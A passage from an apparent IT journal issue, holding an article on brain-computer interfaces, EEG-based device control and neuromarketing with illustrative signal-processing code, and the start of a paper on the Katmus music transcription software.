task. These could be then presented by
means of colors on real images of the
cerebral structure. In such a way
neuroscientists can observe, as on a geographic map, which cerebral areas are more active (more colored) during a
particular experimental task. The high
resolution electroencephalography
(hrEEG) is a brain imaging tool that
gathers the cerebral activity of human
beings "in vivo" by measuring the electrical potential on the head surface [1,
2]. The hrEEG returns images of the
Authors
Fabio Babiloni holds a PhD in
Computational Engineering from the
Helsinki University of Technology,
Finland. He is currently Professor of
Physiology at the Faculty of Medicine
of the Università di Roma La Sapienza,
Italy. Professor Babiloni is author of
more than 185 papers on bioengineering
and neurophysiological topics on
international peer-reviewed scientific
journals, and more than 250 contributions
to conferences and books chapters. His
total impact factor is more than 350 and
his H-index is 37 (Google Scholar).
Current interests are in the field of
estimation of cortical connectivity from
EEG data and the area of BCI. Professor
Babiloni is currently grant reviewer for
the National Science Foundation (NSF)
USA, the European Union through the
FP6 and FP7 research programs and
other European agencies. He is an
Associate Editor of four scientific
Journals: "IEEE Trans. On Neural
System and Rehabilitation Engine-
ering", "Frontiers in Neuroprosthesis",
"International Journal of Bioelectromagnetism" and "Computational
Intelligence and Neuroscience".
<[email protected]>
Gianluca Zaffiro graduated in
Electronic Engineering from the
Politecnico di Torino, Italy, and joined
the Italian company Telecom in 1994.
He has participated in international
research projects funded by the EU and
MIUR, occupying various positions of
responsibility. He has participated in
IEC standardization activities in telecommunications. Currently he holds
a position as senior strategy advisor in
the Telecom Italia Future Centre, where
he is in charge of conducting analysis
of technological innovation, defines
scenarios for the evolution of ICT and
its impact on telecommunications
services. He is the author of numerous
articles in journals and conferences.
<[email protected]>
cerebral activity with a high temporal
resolution (a millisecond or less), and
a moderate spatial resolution (on the
order of fractions of centimeters). Figure 1 presents images of the cerebral
activity some milliseconds after performing a sensorial stimulation on the
right wrist of a healthy subject. The three-dimensional head model, on the left
side of the picture, is employed for the
estimation of the cerebral activity. The
cerebral cortex, dura mater (the meningeal membrane that envelops the
brain), the skull and the head surface
are represented. The spheres show the
position of the electrodes employed for
the recording of the hrEEG. In the same
picture, in the upper row we can observe the sequence of the distribution
of the cerebral activity during an electrical stimulation on the wrist, coded
with a color scale ranging from purple
to red. In the second row we present
the cortical activity, related to the same
temporal instants represented in the
previous line, that is to say the superficial part of the brain (the cortex)
which plays a key role in complex
mental mechanisms such as memory,
concentration, thought, and language.
In the last decades, the use of modern tools of brain imaging has made it possible to clarify the main cerebral structures
involved in cognitive and motor processes of the human being. These techniques have highlighted the key role
of particular cerebral areas, such as the
ones located just on the back of forehead and near the sockets (prefrontal
and orbitofrontal areas), in the planning
and generation of voluntary actions, as
well as in the short and medium term
memorization of concepts and images
[3]. In the last years "signs" of the cerebral activity related to variation of
memorization, attention and emotion,
in tasks always more similar to everyday life conditions, have been measured and recognized.
2 Brain-computer Interfaces’
Working Principle
In recent years researchers have observed, by means of hrEEG techniques, that in human beings the act of evoking motor activities engages the same cerebral areas involved in the control of the real movement of the limbs. This important experimental evidence is at the basis of a technology, known as the "brain-computer interface" (BCI), which aims at controlling electronic and mechanical devices only by means of the modulation of people's cerebral activity. Figure 2 presents the scheme of a typical BCI system: on the left side a user is represented who, with his/her own mental effort, produces a change in the electrical brain activity
Figure 1: Images of the Cerebral Activity some Milliseconds after a Sensorial Stimulation.
Figure 2: Logical Scheme of a BCI System.
which can be detected by means of recording devices and analysis of the EEG signals. If such activity is generated periodically, an automatic system can recognize the generation of these mental states by means of proper classification routines. The system can then generate actions in the outside world and give feedback to the user.
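The closed loop just described (record the EEG, recognize the mental state, act on the outside world, give feedback) can be summarized in a few lines. The sketch below is purely illustrative: every helper in it is a stub standing in for real acquisition, feature-extraction and classification code, and none of the names belong to an actual BCI package.

```cpp
// Illustrative sketch of the closed BCI loop of Figure 2. All helpers are
// stubs standing in for real acquisition, signal analysis and classification.
#include <iostream>
#include <vector>

struct EegEpoch { std::vector<double> samples; double samplingRateHz; };
enum class MentalState { Rest, MotorImagery };

EegEpoch acquireEpoch() {                       // stub: would read ~1 s of EEG from the amplifier
    return EegEpoch{std::vector<double>(256, 0.0), 256.0};
}
double extractFeature(const EegEpoch&) {        // stub: e.g. 8-12 Hz band power (see below)
    return 0.0;
}
MentalState classify(double feature) {          // stub: a trained classifier would decide here
    return feature < 0.5 ? MentalState::MotorImagery : MentalState::Rest;
}
void actuate(MentalState s) {                   // action in the outside world: cursor, light, robot...
    std::cout << (s == MentalState::MotorImagery ? "move cursor\n" : "do nothing\n");
}
void giveFeedback(MentalState s) {              // feedback so the user can learn to modulate the EEG
    std::cout << (s == MentalState::MotorImagery ? "imagery detected\n" : "rest\n");
}

int main() {
    for (int i = 0; i < 5; ++i) {               // in a real system this loop runs continuously
        EegEpoch epoch = acquireEpoch();
        MentalState state = classify(extractFeature(epoch));
        actuate(state);
        giveFeedback(state);
    }
}
```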
In particular, it can be observed experimentally that a subject can learn to autonomously modify the frequency pattern of his/her own EEG signals, without the need to resort to external stimuli. The so-called mu rhythm, a particular EEG wave, can be recorded from the scalp by means of surface electrodes located near the top of the head and slightly behind it (centro-parietal areas). It is known that such a rhythm undergoes a strong reduction of its oscillation amplitude (around 8-12 Hz) during limb movements; this phenomenon is known in the literature as desynchronization of the alpha rhythm. Through training, a subject can learn how to achieve such a desynchronization of the EEG rhythm in the absence of a visible movement, simply by evoking the movement of the same limb. In this way it is possible for the user to achieve voluntary control of a component of his/her own cerebral activity which can be detected in a particular EEG frequency band (8-12 Hz), preferentially on electrodes over particular cortical areas (sensory-motor areas). As already explained, the simple evocation of motor acts generates patterns of cerebral activity which are basically stable and repeatable in time whenever the subject performs such an evocation [4, 5]. It is neither obvious nor simple for automatic systems to recognize voluntary modifications of the EEG trace with error rates low enough to safely drive mechanical and electronic devices. The main difficulties in recognizing the induced potential modifications on the scalp are manifold. First, a proper learning technique is required to let the subject control a specific pattern of his/her own EEG. Such a technique requires the use of appropriate instrumentation that analyzes the EEG signals in real time
Figure 3: The subject generates a cortical activity recognizable by a computer by varying his/her own mental state. This phenomenon moves the cursor (red point on the screen) towards one of the possible targets (red bar on the edge of the screen).
and sends instantaneous feedback to the subject; the availability of a proper methodology, so that the subject is not frustrated by the common temporary failures during the training sessions; and, finally, proper knowledge of the training software, so that the operator can efficiently adjust specific BCI parameters to facilitate control for each subject. The second difficulty in recognizing mental activity by EEG analysis comes from the low signal-to-noise ratio which is a typical feature of the EEG itself. In fact, at rest this signal is characterized by an oscillatory behavior which normally makes variations of the mu-rhythm amplitude difficult to detect. In order to address this issue properly, specific signal-processing techniques must be adopted to extract the most relevant EEG features, employing adequate automatic classification routines, known as classifiers. Just as fingerprints are compared against a police database to recognize people, the EEG features are compared with those obtained from the subject during the training period. The extraction of the EEG features is often done by means of an estimate of the power spectral density of the signal itself in a frequency range of 8-16 Hz. The recognition of these features as belonging to a specific mental state generated by the user during the training period is then performed by classifiers implementing mechanisms relying on artificial neural networks. Once such classifiers make a decision about the user's motor evocation state, a control action is performed by an electronic or mechanical device in the surrounding environment.
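To make the feature-extraction step more concrete, the sketch below estimates the power of a single EEG channel in the 8-12 Hz mu band using the Goertzel algorithm and compares it with a resting baseline, which is one simple way of detecting the desynchronization described above. It is purely illustrative: the sampling rate, the synthetic signals and the threshold are assumptions, and real BCI systems rely on richer spectral estimates and trained classifiers such as the neural networks mentioned in the text.

```cpp
// Illustrative sketch: mu-band (8-12 Hz) power of a single EEG channel,
// estimated with the Goertzel algorithm and compared with a resting baseline
// to decide whether the rhythm is desynchronized (motor imagery) or not.
#include <cmath>
#include <cstddef>
#include <iostream>
#include <vector>

const double kPi = 3.14159265358979323846;

// Power of the signal at one target frequency (Goertzel algorithm).
double goertzelPower(const std::vector<double>& x, double freqHz, double fsHz) {
    const double coeff = 2.0 * std::cos(2.0 * kPi * freqHz / fsHz);
    double s1 = 0.0, s2 = 0.0;
    for (double sample : x) {
        const double s0 = sample + coeff * s1 - s2;
        s2 = s1;
        s1 = s0;
    }
    return s1 * s1 + s2 * s2 - coeff * s1 * s2;
}

// Average power over the 8-12 Hz band, sampled every 1 Hz.
double muBandPower(const std::vector<double>& epoch, double fsHz) {
    double total = 0.0;
    int bins = 0;
    for (double f = 8.0; f <= 12.0; f += 1.0, ++bins)
        total += goertzelPower(epoch, f, fsHz);
    return total / bins;
}

int main() {
    const double fs = 256.0;                          // sampling rate in Hz (illustrative)
    auto makeEpoch = [fs](double muAmplitude) {       // 2 s of synthetic single-channel EEG
        std::vector<double> x(512);
        for (std::size_t n = 0; n < x.size(); ++n)
            x[n] = muAmplitude * std::sin(2.0 * kPi * 10.0 * n / fs);
        return x;
    };
    const double restPower    = muBandPower(makeEpoch(1.0), fs);  // calibration: relaxed subject
    const double imageryPower = muBandPower(makeEpoch(0.3), fs);  // motor imagery attenuates mu

    // Desynchronization: the mu power drops well below the resting baseline.
    const bool imageryDetected = imageryPower < 0.5 * restPower;
    std::cout << "rest: " << restPower << "  imagery: " << imageryPower
              << (imageryDetected ? "  -> imagery detected\n" : "  -> rest\n");
}
```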
Figure 4: Two subjects playing electronic ping-pong without moving muscles, by means of a brain-computer interface installed at Fondazione Santa Lucia in Rome, Italy. (Panels run from A to D.)
Figure 5: The Figure presents several moments related to the control of some electronic devices
in a room by using the modulation of the cerebral activity. (Experiments performed in the
laboratories of Prof. Babiloni at Fondazione Santa Lucia, Rome, Italy.)
This physical action is therefore a response to a purely mental event generated by the user, acquired by the hrEEG device and later classified by the BCI software. Figure 3 shows how a user can directly move a cursor in two dimensions through the recognition of mental states. The command that triggers the movement to the right corresponds to evoking a right-hand movement, and vice versa for evoking the left hand. The evocation of right and left foot movements slides the cursor towards upper or lower positions. All the experiments have been performed at IRCCS Fondazione Santa Lucia in collaboration with the Physiology and Pharmacology Department of the Università di Roma La Sapienza, Italy.
Figure 4 shows two subjects playing ping-pong by means of a BCI. In this case the modulation of the mental activity translates into the movement of a cursor on the screen towards upper and lower positions for both subjects.
3 Examples of Use of BCI Technology in the ICT Domains of Robotics and Device Control
Figure 5 presents some existing functionalities available for the control of simple electronic devices in a room. In frames A and B it can be noticed how the subject switches on a light through the selection of an appropriate icon on the screen, just by using mental activity. In frames C and D of the same figure it can be observed how the same user can control the movement of a simple robot by using the modulation of cerebral activity. The possibility of controlling the robot, equipped with a camera on its head, allows a disabled user to show his/her presence in other parts of the home instead of having to use ubiquitous videocameras in every room, which would harm the privacy of the caregivers.
In the area of assisted living there are companies working on the creation of a prototype of a motorized wheelchair controlled by using brain-computer interface technology. A possible example of such a device is shown in Figure 7, as recently demonstrated by Toyota [6]. Figure 6 presents how a robotic device is controlled by using cerebral activity; this could also be used in contexts beyond tele-presence or domotics, for example in entertainment applications.
4 On the Use of BCI Systems in the Near Future
BCI systems are currently studied to improve the quality of life of patients affected by severe motor disabilities, in order to provide them with some degree of autonomy in movement or decision. The next step for such systems is to make them available to non-disabled people in normal daily-life situations. For instance, a videogame could be controlled just by thoughts (see Section 5), or messages could be sent, by modulating our mental activity, to other users constantly connected to us. Such activity would be gathered by a few unobtrusive, invisible sensors placed on the scalp, and the computational unit would be no bigger than a watch and easily wearable. Although this kind of scenario seems taken from a science-fiction book or movie, a description like this of our future comes from a study by the European Union on new lifestyles in 2030, the fruit of several days of debate between scientists from different disciplines, including ICT and health [7].
Figure 6: Robotic device (Aibo from Sony) driven by the modulation of EEG brainwaves as gathered by the EEG cap visible in some frames at the bottom right corner (frames have to be read from left to right and from the upper to the lower part). These pictures show the possibility of sending mental commands via wireless technology to the Sony Aibo robot.
Figure 7: Motorized Wheelchair driven by BCI Technology, from Toyota.
5 Neuroscience and BCIs are already used in the Entertainment and Cognitive Training Markets
Figure 8: Game Controller developed by Emotiv, a California-based Company.
Figure 9: XWAVE plays by using Cerebral Brainwaves on iPhone.
Several examples of commercial solutions based on BCIs are reported in this section to demonstrate that these technologies are also present outside research labs. In most cases these solutions, in areas such as gaming, healthcare,
coaching or training, are sold at prices ranging from tens to thousands of dollars. Some companies address the controller market for PC videogames: for example, two American companies, Emotiv and OCZ Technologies, are providing BCIs that interpret both muscle movements and electrical cortical signals. Their devices consist of a headband or helmet equipped with special electrodes, and sell for $100-300. The Emotiv controller, shown in Figure 8, comes with a set of classic arcade games such as "brain-controlled" versions of Ping Pong and Tetris.
Other companies are offering these game controllers for smartphones or tablets, such as Xwave or MindSet. MindSet is a BCI developed by the American company NeuroSky which allows you to play BrainMaze with a Nokia N97, driving a ball with your mind through a labyrinth [8]. Xwave, a PLX Devices creation (Figure 9), is a device connected to your iPhone or iPad which allows you to compete in games or train your mind [9]. BCIs have also made inroads into toys: big companies like Mattel and Uncle Milton are producing two similar toys, respectively Mind Flex (Figure 10) and the Star Wars Science Force Trainer. These toys are available for about $100. Both of them are based on
a brainwave-controlled fan used to levitate a foam ball, which in turn has to be moved around to a given position. In the United States of America (USA) alone, the market for "cognitive training" has increased from 2 million dollars in 2005 to 80 million in 2009 [10].
Much attention has been attracted by neurofeedback, a technique aimed at training people to control their own brainwaves through a graphical display of them. This procedure is used both in
Figure 10: Mattel’s Toy based on BCI.
Figure 11: An experimental setup related to an experiment of synthetic telepathy at the laboratory
of the Fondazione Santa Lucia and the Università di Roma La Sapienza, Italy, led by Prof. Babiloni.
The two subjects are exchanging simple information bits (the cursor is moving up or down) just by
modulating their cerebral activity through a brain computer interface system linking them.
medicine, as a treatment for disorders such as ADD (Attention Deficit Disorder), and in the training of professionals, students and athletes, so as to improve their concentration, attention and learning performance.
At CES 2011, the most important consumer-electronics exhibition worldwide, a BCI-based prototype system for ADD treatment, BrainPal, was unveiled [11]. In Sweden, Mindball, a therapeutic toy used to train the brain to relax or concentrate, is available from ProductLine Interactive. Some top-level soccer teams like AC Milan and Chelsea have been undertaking neurofeedback training.
6 Applied Neuroscience can
support Marketing and Advertising of Products and Services
Business people are looking into neuroscience in order to understand and predict human buying mechanisms. Neuromarketing is a discipline born from the combination of these two fields, aiming at understanding why a buyer chooses a product or service. Much attention is now directed to the analysis of advertising, notoriously one of the most effective stimuli for purchases.
Traditional marketing assesses people's reactions to advertising stimuli with indirect techniques (observation, interviews and questionnaires), whilst neuromarketing investigates the direct physiological response caused by advertising stimuli (the electrical response of the brain) and from this it infers the cognitive implications (levels of attention, memory and pleasure). Neuromarketing does not assess behaviors but tries to find out how advertising stimuli "leave their mark" in people's brains. Two approaches based on cortical EEG measures have mainly been adopted in the market. One is the scientific approach, which starts from the neuroscience evidence to infer the effectiveness of a given stimulus by measuring, with a high-density EEG (>60 electrodes), the cortical electrical activity in all the areas of the brain. This approach can be simplified by limiting the area of the neural signal measurements to the frontal lobes, on which a minimum of 10 electrodes should be applied; these are sufficient to acquire indicators for levels of attention, memory and emotion.
The obvious advantage of this approach is that the results can be directly related to scientific evidence, but there are limits to the practicality and scalability of the test, since it often requires measurement devices that are uncomfortable to wear and time-consuming in terms of the subject's preparation.
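As a purely illustrative aside, two families of indices often derived from frontal EEG electrodes in this kind of study are a memorization-related index based on frontal theta power and an emotion-related index based on frontal alpha asymmetry. The sketch below computes both from pre-computed band powers; the electrode sets, the numbers and the index definitions are assumptions made for the example and are not the proprietary indices of any of the companies mentioned in this article.

```cpp
// Heavily simplified sketch of two indices often derived from frontal EEG
// electrodes (illustrative assumptions, not any company's proprietary metric):
// a memorization-related index from frontal theta power and an emotion-related
// index from frontal alpha asymmetry.
#include <iostream>
#include <numeric>
#include <vector>

double mean(const std::vector<double>& v) {
    return std::accumulate(v.begin(), v.end(), 0.0) / v.size();
}

int main() {
    // Band powers per frontal electrode, assumed to be computed elsewhere
    // (e.g. with the spectral estimation discussed in Section 2).
    std::vector<double> thetaPower      = {4.1, 3.8, 4.4, 4.0};  // 4-8 Hz, all frontal sites
    std::vector<double> alphaLeftPower  = {2.0, 2.2};            // 8-12 Hz, left frontal sites
    std::vector<double> alphaRightPower = {1.4, 1.5};            // 8-12 Hz, right frontal sites

    // Higher frontal theta during encoding is commonly associated with
    // better memorization of the stimulus.
    double memorizationIndex = mean(thetaPower);

    // Frontal alpha asymmetry: relatively less alpha over the left hemisphere
    // (i.e. more left activation) is commonly read as a more positive,
    // approach-oriented reaction, giving a positive index here.
    double l = mean(alphaLeftPower), r = mean(alphaRightPower);
    double emotionIndex = (r - l) / (r + l);

    std::cout << "memorization index: " << memorizationIndex
              << "  emotion index: " << emotionIndex << '\n';
}
```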
The other approach is the heuristic one, whose strength lies in the use of proprietary EEG equipment with a reduced number of electrodes (it could be just one electrode centrally positioned on top of the head, or two on the frontal lobes) with which the parameters of interest in neuromarketing are measured. The simplified arrangements encourage portability by reducing discomfort and preparation time, with the aim of making the testing process as close as possible to the actual experience of the subject. However, today it is not possible to compare the results obtained in this way with the scientific literature.
Focus on Neuromarketing
In this section we report the application areas that neuromarketing companies are addressing today, together with some examples of studies promoted by well-known international companies.
• Advertising: Neuromarketing is widely used to measure the effectiveness of print ads or videos (commercials) and to enhance them as a function of communication campaigns. Case studies: we report an analysis produced by BrainSigns, a spin-off of the "La Sapienza" University of Rome. Figure A in this box presents two diagrams obtained for a population of viewers watching a TV commercial. The spot featured a flirt scene (a girl's message immediately interrupted) that literally "catalysed" the attention and the memorization of the viewers at the expense of attention to, and memorization of, the advertised brand and its message. The viewers liked the spot, but they did not get the intended message from it. As a second example, Coca-Cola commissioned EmSense [13] to perform a study using neuromarketing techniques to choose, between several possibilities, the most effective commercial to air on television during the Superbowl, the final game of the USA National Football League. Finally, on Google's behalf, NeuroFocus used neuromarketing techniques [14] to assess the impact on users of the introduction on YouTube of InVideo Ads, which are semi-transparent banner ads superimposed on YouTube videos streamed over the Internet.
• Multimedia: Neuromarketing can evaluate a movie trailer, an entire movie or a television show with the aim of understanding how the engagement level of the audience changes in time and of identifying the points of a movie where, for example, there are high levels of suspense or surprise in the audience. Case studies: 20th Century Fox commissioned Innerscope [15] to evaluate the movie trailers for the films "28 Weeks Later" and "Live Free or Die Hard". NBC also commissioned Innerscope [15] to study viewers' perception of advertising during the fast-forwarding of recorded TV content.
• Ergonomics: Neuroscience can improve the design process of device interfaces and improve the user experience, assessing the cognitive workload required to learn how to use the device, and the engagement, satisfaction or stress levels generated by its use. Case study: in 2006 Microsoft [16] decided to apply EEG to experimentally investigate how to perform user task classification using a low-cost electroencephalograph.
• Packaging: Neuromarketing can be used to obtain a more appealing package design, so that, for example, a customer can recognize the product more easily on a supermarket shelf, choosing it among others like it.
• Videogames: Neuromarketing can evaluate the players' engagement, identify the most interesting features of the games and optimize their details. During all phases of the game, the difficulty level can be calibrated properly so that a game is challenging, but not excessively difficult. Case study: EmSense conducted a study [17] on the "first person shooter" genre of videogames in which, during the game, they evaluated the levels of positive emotion, engagement and cognitive activation of the players as a function of time.
• Product placement: Neuromarketing studies can support the identification of the best positioning of a product on a supermarket shelf and the optimal placement of advertising for a product or a brand in a scene during a TV show.
• Politics: Neuromarketing techniques can be applied to carry out studies in the political sphere, for example by measuring the reactions of voters to candidates at rallies and speeches. Case study: during the 2010 elections for the UK Prime Minister [18], NeuroFocus conducted and published a study measuring prospective voters' neurological reactions, highlighting the subconscious scores evoked by the candidates in a sample of subjects.
Figure A: Mean changes of attention (left) and memorization (right) of a given audience while watching a commercial. The higher the signal, the more active the processes of attention and memory toward the spot. (Courtesy BrainSigns Ltd.)
Neuromarketing is extremely suitable for supporting the design of advertising spots: it makes it possible to increase their ability to stimulate attention and memory retention, and to place the advertisement in a manner consistent with the brand. In the post-creative phase of a TV spot, it is useful to measure comparative efficacy and to select and optimize the existing spots, reducing their time format. Finally, in the spot programming phase it makes it possible to optimize the frequency within a given broadcasting timeframe, checking in the lab how long subjects have to be exposed for the commercial to be memorized.
Today, most companies operating in neuromarketing are located in the USA, where they were founded in the last five years. Many of these employ devices for neurophysiological measures (EEG and sensors) developed in-house, while others adopt technological solutions from third parties (see the box section "Focus on Neuromarketing").
7 What is going on in Research about ICT and Neuroscience
During the years 2007-2011 the European Union supported, with more than 30 million euros, research projects linked to the use of BCI systems for the control of videogames, domestic appliances, and mechatronic prostheses for hands and limbs. In addition, EU funding has also been directed to the evaluation of the mental state of the passengers of aircraft during transoceanic flights, in order to provide them with on-board services in agreement with their emotional state. Another interesting area of research in which the EU has supported scientific studies is the on-line monitoring of the cerebral workload of drivers of public vehicles, such as aircraft or trains, as well as cars.
Recently a research line related to the field of so-called "synthetic telepathy" has been developed in the USA, where the capability of two ordinary people to exchange information between them just by using the modulation of their cerebral activity is being tested. This is made possible by using the concepts developed in the field of BCI. In particular, Figure 11 presents an experimental setup of "synthetic telepathy" developed at the joint laboratories of the Fondazione Santa Lucia and the Università di Roma La Sapienza, Italy. In the picture two subjects are exchanging information about the position of an electronic cursor on the screen, which they are able to move by using a modulation of their cerebral activity. Although at this moment the transmission speed is really limited, to a few bits per minute, the proof of concept of such devices has already been demonstrated.
8 Conclusions
In this paper the main research streams involving both neuroscience and ICT have been described briefly. There is an increasing interest from the ICT area in the results offered by neuroscience, in terms of a new generation of ICT devices and tools "powered" by the ability to be guided by mental activity. Although the state of the art is still far from everyday technological implementations like those shown in modern science-fiction movies, there are nowadays thousands of researchers engaged in the area of brain-computer interfaces, researching next-generation electronic devices, while 10 years ago there were very few. As the eminent neuroscientist Martha Farah said recently [12], the question is not "if" but rather "when" and "how" our future will be shaped by neuroscience. At that time it will be better to be ready to ride the "neuro-ICT revolution".
References
[1] Babiloni F., Babiloni C., Carducci
F., Fattorini L., Onorati P., Urbano
A., Spline Laplacian estimate of
EEG potentials over a realistic magnetic resonance-constructed scalp surface model. Electroenceph. clin. Neurophysiol., 98(4):363-373, 1996.
[2] Nunez P., Neocortical Dynamics
and Human EEG Rhythms, Oxford University Press, 1995
[3] Damasio A. R., L’ errore di
Cartesio. Emozione, ragione e
cervello umano, Adelphi, 1995.
[4] Wolpaw J. R., Birbaumer N.,
McFarland D. J., Pfurtscheller G.,
Vaughan T. M., Brain computer
interfaces for communication and
control. Clinical Neurophysiology, 113:767-791, 2002.
[5] Babiloni F., Cincotti F., Marciani M., Salinari S., Astolfi L., Aloise
F., De Vico Fallani F., Mattia D.,
On the use of brain-computer interfaces outside scientific laboratories toward an application in
domotic environments. Int. Rev.
Neurobiol. 86:133-46, 2009.
[6] Toyota, <http://www.toyota.co.jp/
en/news/09/0629_1.html>.
[7] COST (European Cooperation in Science and Technology), <http://www.cost.esf.org/events/foresight_2030_ccst-ict>.
[8] Engadget, <http://www.engadget.com/2010/01/18/nokia-n97sbrain-maze-requires-steadyhand-typical-mind-contro>.
[9] Plxwave, <http://www.plxwave.com>.
[10] e! Science News, <http://escience
news.com/articles/200902/09
study. questions.effectiveness.80.
million. year.brain.exercise.
products.industry>.
[11] I2R TechFest, <http://techfest.i2r.a-star.edu.sg/index.php?option=com_content&view=article&id=75&Itemid=56>.
[12] Farah M., Neuroethics: the practical and the philosophical, Trends
in Cogn. Sciences., vol. 9, 2005.
[13] Adweek, <http://www.adweek.com/aw/content_display/news/media/e3i975331243e08d74c5b66f857ff12cfd5>.
[14] Neurofocus, <http://www.neurofocus.com/news/mediagoogle.html>.
[15] Boston.com, <http://www.boston.com/ae/tv/articles/2007/05/13/emote_control>.
[16] Lee J. C., Desney T. S., Using a
Low-Cost Electroencephalograph
for Task Classification in HCI Research, UIST, 2006.
[17] GGl.com, <http://wire.ggl.com/
news/if-you-want-a-good-fpsuse-close-combat>.
[18] PR Newswire, <http://www.
prnewswire.com/news-releases/
neurotips-for-each-candidate-inthe-final-48-hours-of-uk-primeminister-campaign-be-aware-ofvoters-subconscious-scores-forstrengthsweaknesses-be-wary-ofgender-splits-92777229.html>.
UPENET
IT for Music
Katmus: Specific Application to support
Assisted Music Transcription
Orlando García-Feal, Silvana Gómez-Meire, and David Olivieri
© Novática, 2011
This paper will be published, in Spanish, by Novática. Novática <http://www.ati.es/novatica>, a founding member of UPENET, is
a bimonthly journal published by the Spanish CEPIS society ATI (Asociación de Técnicos de Informática – Association of Computer
Professionals).
In recent years, computers have become an essential part of music production. Thus, versatile music composition software
which is well mapped to the underlying process of producing music is essential to the professional and novice practitioner
alike. The demand for computer music software covers the full spectrum of music production tasks, including software for
synthesizers, notation editors, digital audio sequencers, automatic transcription, accompaniment, and educational use.
Since different music composition tasks are quite diverse, there is no single application that is well suited to all application
domains and so each application has a particular focus. In this paper, we describe a novel software package, called
Katmus, whose design philosophy accurately captures the specific manual process of transcribing complex musical passages from audio to musical scores. A novel concept, introduced within Katmus, is the synchronization between the audio
waveform and the notation editor, intimately linking the time segments of the music recording to be transcribed to the
measures of the sheet music score. Together with playback, frequency domain analysis of the input signal and a complete
project management system for handling multiple scores per audio file, this system greatly aids the manual transcription
process and represents a unique contribution to the present music software toolset.
Keywords: Education, Katmus,
Music Transcriptions, Open Source
Software, Teaching Resources.
1 Introduction and Motivation
Just as books and texts capture
thoughts and human speech, musical
notation provides a written representation of a complex musical performance. While only approximately perfect, this notational system, in its modern incarnation, provides not only a
representation of the full set of notes
and their durations, but also key signatures, rhythm, dynamic range (volume), and a set of ornamental symbols
for expressing suggested performance
queues and articulations, using a complex system of symbols [1].
Within the scope of this paper,
musical transcription can be defined as
the act of listening to a melody (or polyphony arrangement) and translating
it into its corresponding musical notation, consisting of the set of notes with
their duration with respect to the inferred time signature and rhythm [2].
Authors
Orlando García-Feal was born in
Spain. He obtained an engineering
degree in 2008 from the ESEI, Universidad de Vigo, Spain. Since 2008, he has
worked at the Environmental Physics
Laboratory (Universidad de Vigo), building, maintaining, and writing software
for their large-scale cluster computing
facility. He is presently pursuing his
Ph.D degree in Computer Science. His
research interests include the study of
musical signal processing and cluster
computing. <[email protected]>
Silvana Gómez-Meire holds a PhD
from the Universidad de Vigo, Spain.
She was born in Ourense, Spain, in 1972.
She works as a full-time lecturer in the
Computer Science Department of the
Universidad de Vigo, collaborating as a
researcher with the research group SING
(New Generation Computer Systems)
belonging to the Universidad de Vigo.
Regarding her field of research, she has
worked on topics related to audio signal
analysis and music transcription soft-
ware development, although at present
she is centred on the study of hybrid
methods of Artificial Intelligence and
their application to real problems.
<[email protected]>
David Olivieri was born in the USA.
He received his BSc, MSc and PhD
degrees in Physics (1996) from the
University of Massachusetts, Amherst
(USA). From 1993-1996 he was a doctoral fellow at the Fermi National
Accelerator Laboratory (Batavia, IL,
USA) studying accelerator physics.
From 1996-1999 he was a staff engineer
at Digital Equipment Corporation for the
Alpha Microprocessor product line.
Since 1999, he has been an Associate
Professor at the Universidad de Vigo, in
the School of Computer Engineering
(Spain). He has publications in pure and
applied physics, computer science, audio
signal processing, and bioinformatics.
His present research interests focus on
signal processing and applications
in sound, images and videos.
<[email protected]>
Figure 1: Relationship between an Audio Segment and its corresponding Musical Notation.
Given this definition, Figure 1 shows a short audio signal waveform segment, where different measures with corresponding notes have been identified from the well-defined beats or rhythm extracted from the signal. This schematic mapping from the audio signal to the musical notation is referred to as musical transcription.
In the field of music analysis [3],
the automatic transcription of monophonic melodies has been widely studied [4] and essentially is considered to
be a solved problem. Although more
sophisticated machine learning based
methods may be applied, simple algorithms for extracting monophonic
melodies based on peak-tracking techniques [5] have been shown to be quite
effective. This success, however, is not
true for the general polyphonic music
transcription problem [6]. Indeed, even
for the case of a single polyphonic instrument such as the piano, automatic transcription methods still perform poorly. The more general polyphonic case, consisting of several different instruments (for example in an orchestra) recorded in the same channel, is far beyond the capabilities of present transcription systems or, at best, success is limited to special cases.
Thus, while automatic transcription may help in certain situations, manual transcription remains the gold standard for music practitioners wishing to document their own performances or transcribe the performances of others. This traditional manual transcription, however, is a time-intensive task that strongly depends on the training, musical knowledge, and experience of the person undertaking the process. Indeed, transcription consists of an iterative process: listening to (and normally repeating) short time segments of an audio recording, transcribing the notes in these segments, and then moving on to the next short segment, often returning to transcribed sections in order to qualitatively evaluate the overall consistency. For those not possessing nearly perfect musical memory and pitch, this involves tedious and repetitive interaction with the input audio signal as well as with some music notation editor.
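As a rough illustration of the peak-tracking idea mentioned above for monophonic material, the following sketch scans the spectrum of a short frame for its dominant frequency and maps it to the nearest tempered note. It is deliberately naive (an O(N²) frequency scan on a synthetic tone) and is not the algorithm of any of the tools discussed below.

```cpp
// Illustrative sketch: estimate the dominant pitch of a short monophonic frame
// by scanning spectral magnitudes and mapping the peak frequency to the nearest
// tempered note. A naive O(N^2) search is used for clarity; real tools use an
// FFT plus peak tracking across consecutive frames.
#include <cmath>
#include <cstddef>
#include <iostream>
#include <string>
#include <vector>

const double kPi = 3.14159265358979323846;

// Magnitude of the DFT of x evaluated at an arbitrary frequency (Hz).
double magnitudeAt(const std::vector<double>& x, double freqHz, double fsHz) {
    double re = 0.0, im = 0.0;
    for (std::size_t n = 0; n < x.size(); ++n) {
        const double phase = 2.0 * kPi * freqHz * n / fsHz;
        re += x[n] * std::cos(phase);
        im -= x[n] * std::sin(phase);
    }
    return std::sqrt(re * re + im * im);
}

// Nearest equal-tempered note name for a frequency (A4 = 440 Hz = MIDI 69).
std::string nearestNoteName(double freqHz) {
    static const char* names[12] = {"C", "C#", "D", "D#", "E", "F",
                                    "F#", "G", "G#", "A", "A#", "B"};
    int midi = static_cast<int>(std::lround(69.0 + 12.0 * std::log2(freqHz / 440.0)));
    return std::string(names[midi % 12]) + std::to_string(midi / 12 - 1);
}

int main() {
    const double fs = 44100.0;
    std::vector<double> frame(4096);                  // ~93 ms of audio
    for (std::size_t n = 0; n < frame.size(); ++n)    // synthetic test tone: E4 = 329.63 Hz
        frame[n] = std::sin(2.0 * kPi * 329.63 * n / fs);

    double bestFreq = 0.0, bestMag = 0.0;
    for (double f = 60.0; f <= 2000.0; f += 1.0) {    // scan a plausible melodic range
        const double m = magnitudeAt(frame, f, fs);
        if (m > bestMag) { bestMag = m; bestFreq = f; }
    }
    std::cout << "peak at " << bestFreq << " Hz -> " << nearestNoteName(bestFreq) << '\n';
}
```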
While not directly providing automatic transcription, several software
